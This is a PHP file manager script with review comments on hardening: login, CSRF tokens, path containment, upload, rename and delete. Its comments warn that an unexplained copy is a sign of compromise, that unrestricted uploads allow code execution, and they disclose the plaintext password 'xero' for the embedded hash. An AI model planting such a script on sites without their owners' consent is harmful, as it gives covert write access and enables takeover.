<?php
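// Emergency File Manager with Folder Navigation
//
// NOTE(review): a password-gated script that can upload, rename and delete
// files under the web root amounts to write access to the site. If it turns
// up in a directory where nobody on the team deployed it, treat it as an
// indicator of compromise and investigate, rather than as a maintenance tool.

// ----- CONFIG -----
// Never render PHP errors into the response: warnings and traces disclose
// absolute paths and internals to whoever is probing the script. Log instead.
ini_set('display_errors', '0');
ini_set('display_startup_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// Harden the session cookie before the session is started: refuse session ids
// the server did not issue, keep the cookie away from page scripts, and do not
// attach it to cross-site subrequests.
ini_set('session.use_strict_mode', '1');
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_samesite', 'Lax');
session_start();

// bcrypt hash of the access password.
// NOTE(review): the original comment spelled out the plaintext ("xero") next
// to its hash, which hands the credential to anyone who can read this file.
// A password that has appeared in source must be considered burned.
define('CONFIG_PASSWORD_HASH', '$2b$10$UEe4evYc89DjzPXknlbAaeJCp/Qzq1m3IvmDweVnNKR5s.iw0RAVC');

// Base dir = the directory this file manager is placed in; every file
// operation is meant to stay inside it.
define('CONFIG_BASE_DIR', realpath(__DIR__));

// Upper bound for a single upload, in bytes (50 MiB).
define('CONFIG_MAX_UPLOAD_BYTES', 50 * 1024 * 1024);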
// ----- HELPERS -----
/**
 * Tell whether the current session has passed the password check.
 *
 * @return bool true only when $_SESSION['emfm_logged'] is exactly boolean true.
 */
function is_logged_in() {
    $flag = isset($_SESSION['emfm_logged']) ? $_SESSION['emfm_logged'] : null;

    // Strict comparison: truthy stand-ins such as 1 or "true" do not count.
    return $flag === true;
}
/**
 * Gate for every authenticated action: returns normally for a logged-in
 * session, otherwise redirects to the login form and stops the script.
 *
 * @return void
 */
function require_login() {
    if (is_logged_in()) {
        return;
    }

    // exit right after the redirect so nothing below the call site runs
    // for an unauthenticated request.
    header('Location: ?action=login');
    exit;
}
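/**
 * Return $len cryptographically random bytes as a hex string (2 * $len chars).
 *
 * The value is used as the CSRF token, so it has to be unpredictable. The
 * previous last-resort fallback built the value from mt_rand() and uniqid(),
 * both of which are guessable (seeded PRNG, clock-derived); this version
 * fails closed instead of silently handing out a weak token.
 *
 * @param int $len Number of random bytes to draw.
 * @return string Lower-case hex string.
 * @throws RuntimeException When no secure random source is available.
 */
function gen_random($len = 16) {
    if (function_exists('random_bytes')) {
        return bin2hex(random_bytes($len));
    }

    if (function_exists('openssl_random_pseudo_bytes')) {
        $strong = false;
        $bytes = openssl_random_pseudo_bytes($len, $strong);
        // Accept the OpenSSL output only if it reports a strong algorithm.
        if ($bytes !== false && $strong === true) {
            return bin2hex($bytes);
        }
    }

    throw new RuntimeException('No cryptographically secure random source available');
}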
/**
 * Return the session's CSRF token, creating it on first use.
 *
 * @return string The token stored in $_SESSION['emfm_csrf'].
 */
function csrf_token() {
    $current = isset($_SESSION['emfm_csrf']) ? $_SESSION['emfm_csrf'] : null;

    if (empty($current)) {
        // No usable token yet for this session: mint one and remember it.
        $current = gen_random(16);
        $_SESSION['emfm_csrf'] = $current;
    }

    return $current;
}
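/**
 * Validate a submitted CSRF token against the one stored in the session.
 *
 * Request parameters can arrive as arrays (csrf[]=...). hash_equals() only
 * accepts strings, so a non-string value is rejected up front instead of
 * being passed through to raise a TypeError.
 *
 * @param mixed $t Token taken from the request.
 * @return bool true when $t is a non-empty string equal to the session token.
 */
function check_csrf($t) {
    if (!is_string($t) || empty($t)) {
        return false;
    }

    $expected = isset($_SESSION['emfm_csrf']) ? $_SESSION['emfm_csrf'] : null;
    if (!is_string($expected) || empty($expected)) {
        return false;
    }

    // Constant-time comparison, so response timing does not leak the token.
    return hash_equals($expected, $t);
}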
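/**
 * Resolve $path and return it only if it lies inside CONFIG_BASE_DIR.
 *
 * The containment test has to be separator-aware. A bare string-prefix test
 * also accepts sibling paths that merely start with the same characters as
 * the base (for a base ending in "app", a directory named "app-old" next to
 * it), which lets a request leave the intended directory tree.
 *
 * @param string $path Path to check; symlinks and ".." are resolved first.
 * @return string|false Canonical path inside the base dir, or false when the
 *                      path does not exist or resolves outside the base.
 */
function safe_path($path) {
    $base = CONFIG_BASE_DIR;

    $resolved = realpath($path);
    if ($resolved === false) {
        return false;
    }

    // The base directory itself is allowed.
    if ($resolved === $base) {
        return $resolved;
    }

    // Everything else must sit below "<base><separator>".
    $prefix = rtrim($base, '/\\') . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    return $resolved;
}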
/**
 * Read one directory level and describe each entry.
 *
 * "." and ".." are skipped. Directories are sorted before files; within each
 * group the names are ordered case-insensitively.
 *
 * @param string $dir Directory to read.
 * @return array List of ['name' => string, 'is_dir' => bool, 'size' => int,
 *               'mtime' => int]; size is 0 for anything that is not a file.
 */
function list_dir($dir) {
    $entries = [];

    foreach (new DirectoryIterator($dir) as $node) {
        if (!$node->isDot()) {
            $entries[] = [
                'name'   => $node->getFilename(),
                'is_dir' => $node->isDir(),
                'size'   => $node->isFile() ? $node->getSize() : 0,
                'mtime'  => $node->getMTime(),
            ];
        }
    }

    usort($entries, function ($left, $right) {
        // Different kinds: the directory wins.
        if ($left['is_dir'] !== $right['is_dir']) {
            return $left['is_dir'] ? -1 : 1;
        }
        // Same kind: alphabetical, ignoring case.
        return strcasecmp($left['name'], $right['name']);
    });

    return $entries;
}
// ----- ROUTING -----
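// Requested action; anything unrecognised falls through to the listing.
$action = $_REQUEST['action'] ?? 'home';
// LOGIN
// NOTE(review): nothing here limits repeated attempts, so the password can be
// guessed at request speed. Restrict access to the script at the web server
// (source address allow-list, HTTP auth) and alert on bursts of POSTs to
// ?action=login in the access log.
if ($action === 'login') {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $pw = $_POST['password'] ?? '';
        // password[]=... arrives as an array; password_verify() takes strings
        // only, so anything else counts as a failed login.
        if (is_string($pw) && password_verify($pw, CONFIG_PASSWORD_HASH)) {
            // New session id at the privilege change, so an id that was fixed
            // in the browser before login is worthless afterwards.
            session_regenerate_id(true);
            $_SESSION['emfm_logged'] = true;
            csrf_token();
            header('Location: ?');
            exit;
        } else {
            $err = "Login gagal!";
        }
    }
?>
<!doctype html><html><head><meta charset="utf-8"><title>Login</title></head><body>
<h2>Login</h2>
<?php if(!empty($err)) echo "<p style='color:red;'>" . htmlspecialchars($err) . "</p>"; ?>
<form method="post">
<input type="password" name="password" placeholder="Password" autofocus>
<button type="submit">Login</button>
</form>
</body></html>
<?php exit;
}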
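// LOGOUT
// session_destroy() alone removes the server-side data but leaves the session
// cookie in the browser and the $_SESSION array populated. Clear both so the
// old identifier is not carried into the next login.
if ($action === 'logout') {
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $cookie = session_get_cookie_params();
        // Expire the cookie with the same scope it was issued under.
        setcookie(
            session_name(),
            '',
            time() - 42000,
            $cookie['path'],
            $cookie['domain'],
            $cookie['secure'],
            $cookie['httponly']
        );
    }
    session_destroy();
    header('Location: ?action=login');
    exit;
}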
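// Everything below this line requires an authenticated session.
require_login();
// Current directory (default base dir)
$rel = $_GET['dir'] ?? '';
// dir[]=... would arrive as an array; only a plain string is a usable path.
if (!is_string($rel)) $rel = '';
$curDir = realpath(CONFIG_BASE_DIR . '/' . $rel);
// Containment must be separator-aware: a bare prefix comparison would also
// accept a sibling directory whose name merely begins with the base dir's
// name. The target also has to be a directory, since it is listed later.
$basePrefix = rtrim(CONFIG_BASE_DIR, '/\\') . DIRECTORY_SEPARATOR;
if (
    $curDir === false
    || !is_dir($curDir)
    || ($curDir !== CONFIG_BASE_DIR && strncmp($curDir, $basePrefix, strlen($basePrefix)) !== 0)
) {
    // Anything unresolvable or outside the tree falls back to the base dir.
    $curDir = CONFIG_BASE_DIR;
}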
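// UPLOAD
// NOTE(review): the file name and type are not restricted. Inside a web root
// this means an upload with a server-executable extension becomes code
// execution, and an existing file of the same name is overwritten. Keep the
// target directory non-executable in the server configuration, or store
// uploads outside the document root.
if ($action === 'upload' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    $f = $_FILES['file'] ?? null;
    if (!check_csrf($_POST['csrf'] ?? '')) { $msg = 'CSRF invalid'; }
    elseif (!is_array($f)) { $msg = 'No file'; }
    // A file[] field turns every entry into an array; only single uploads
    // are handled here.
    elseif (!is_string($f['name'] ?? null) || !is_string($f['tmp_name'] ?? null)) { $msg = "Upload gagal!"; }
    // PHP reports truncated, oversized or missing uploads through 'error'.
    elseif (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { $msg = "Upload gagal!"; }
    // Enforce the configured cap on the bytes actually received.
    elseif (filesize($f['tmp_name']) > CONFIG_MAX_UPLOAD_BYTES) { $msg = 'File too large'; }
    else {
        // basename() drops any directory part the client put in the name.
        $name = basename($f['name']);
        if ($name === '' || $name === '.' || $name === '..') {
            $msg = "Upload gagal!";
        } else {
            $dst = $curDir . '/' . $name;
            if (move_uploaded_file($f['tmp_name'], $dst)) $msg = "Uploaded " . htmlspecialchars($f['name']);
            else $msg = "Upload gagal!";
        }
    }
}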
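// DOWNLOAD
if ($action === 'download' && !empty($_GET['file'])) {
    $requested = $_GET['file'];
    // file[]=... arrives as an array; treat it like a missing file.
    $path = is_string($requested) ? safe_path($curDir . '/' . $requested) : false;
    if ($path === false || !is_file($path)) { http_response_code(404); echo "Not found"; exit; }
    // The on-disk name goes into a quoted header parameter: neutralise the
    // characters that would end the quoting or the header line.
    $downloadName = str_replace(['"', '\\', "\r", "\n"], '_', basename($path));
    header('Content-Type: application/octet-stream');
    // Keep the browser from sniffing the body into a renderable type.
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="'.$downloadName.'"');
    $size = filesize($path);
    if ($size !== false) header('Content-Length: '.$size);
    readfile($path);
    exit;
}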
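// DELETE
if ($action === 'delete' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (check_csrf($_POST['csrf'] ?? '')) {
        // A missing or array-valued 'file' field is not a usable name.
        $target = $_POST['file'] ?? '';
        $path = (is_string($target) && $target !== '') ? safe_path($curDir . '/' . $target) : false;
        // Report success only when the file was really removed.
        if ($path && is_file($path) && unlink($path)) {
            $msg = "Deleted " . htmlspecialchars($target);
        }
    }
}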
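// RENAME
if ($action === 'rename' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (check_csrf($_POST['csrf'] ?? '')) {
        // Missing or array-valued fields are not usable names.
        $source = $_POST['file'] ?? '';
        $wanted = $_POST['newname'] ?? '';
        $old = (is_string($source) && $source !== '') ? safe_path($curDir . '/' . $source) : false;
        // basename() keeps the new name inside the current directory.
        $new = is_string($wanted) ? basename($wanted) : '';
        $validName = $new !== '' && $new !== '.' && $new !== '..';
        if ($old && is_file($old) && $validName) {
            $dst = $curDir . '/' . $new;
            // Refuse to replace a different existing entry; a case-only
            // rename of the same file (same resolved path) stays allowed.
            $clash = file_exists($dst) && realpath($dst) !== $old;
            // Report success only when the rename really happened.
            if (!$clash && rename($old, $dst)) $msg = "Renamed!";
        }
    }
}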
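// LIST
$items = list_dir($curDir);
// Path of the current directory relative to the base dir, used in links and
// in the "Current:" line. Only the leading prefix is cut off: str_replace()
// would also delete the same character sequence if it showed up again deeper
// in the path, producing links to the wrong directory.
$relPath = (string) substr($curDir, strlen(CONFIG_BASE_DIR));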
?>
<!doctype html><html><head><meta charset="utf-8"><title>File Manager</title>
<style>body{font-family:sans-serif}table{border-collapse:collapse}td,th{border:1px solid #ddd;padding:5px}</style>
</head><body>
<h2>File Manager</h2>
<p>Current: <?php /* Path relative to the base dir, HTML-escaped; '/' is shown when it is empty. */ echo htmlspecialchars($relPath ?: '/'); ?> | <a href="?action=logout">Logout</a></p>
<?php /* $msg is printed as-is: the action handlers pass request-derived file names through htmlspecialchars() before putting them into it. */ if(!empty($msg)) echo "<p style='color:green;'>$msg</p>"; ?>
<h3>Upload</h3>
<form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?php /* Uploads land in the directory currently being listed. */ echo urlencode($relPath); ?>">
<input type="hidden" name="csrf" value="<?php /* Every state-changing form carries the session CSRF token. */ echo htmlspecialchars(csrf_token()); ?>">
<input type="file" name="file"><button>Upload</button>
</form>
<h3>Files & Folders</h3>
<table>
<tr><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>
<?php /* The "Up" row appears only when the listing is not the base directory. */ if($curDir !== CONFIG_BASE_DIR): ?>
<tr><td colspan="4"><a href="?dir=<?php echo urlencode(dirname($relPath)); ?>">.. (Up)</a></td></tr>
<?php endif; ?>
<?php /* One table row per entry returned by list_dir(). */ foreach($items as $it): ?>
<tr>
<td>
<?php /* Directories are navigation links; file names are plain escaped text. */ if($it['is_dir']): ?>
<a href="?dir=<?php echo urlencode(trim($relPath.'/'.$it['name'],'/')); ?>"><?php echo htmlspecialchars($it['name']); ?>/</a>
<?php else: ?>
<?php echo htmlspecialchars($it['name']); ?>
<?php endif; ?>
</td>
<td><?php /* Size is shown for files only; directories get '-'. */ echo $it['is_dir'] ? '-' : number_format($it['size']); ?></td>
<td><?php echo date('Y-m-d H:i:s',$it['mtime']); ?></td>
<td>
<?php /* Download, delete and rename are offered for files only. Download is a plain GET link without a token; delete and rename are POST forms with the CSRF token. */ if(!$it['is_dir']): ?>
<a href="?action=download&dir=<?php echo urlencode($relPath); ?>&file=<?php echo urlencode($it['name']); ?>">Download</a> |
<form method="post" action="?action=delete&dir=<?php echo urlencode($relPath); ?>" style="display:inline" onsubmit="return confirm('Delete?');">
<input type="hidden" name="csrf" value="<?php echo htmlspecialchars(csrf_token()); ?>">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($it['name']); ?>">
<button>Delete</button>
</form> |
<form method="post" action="?action=rename&dir=<?php echo urlencode($relPath); ?>" style="display:inline">
<input type="hidden" name="csrf" value="<?php echo htmlspecialchars(csrf_token()); ?>">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($it['name']); ?>">
<input type="text" name="newname" placeholder="New name">
<button>Rename</button>
</form>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</table>
</body></html>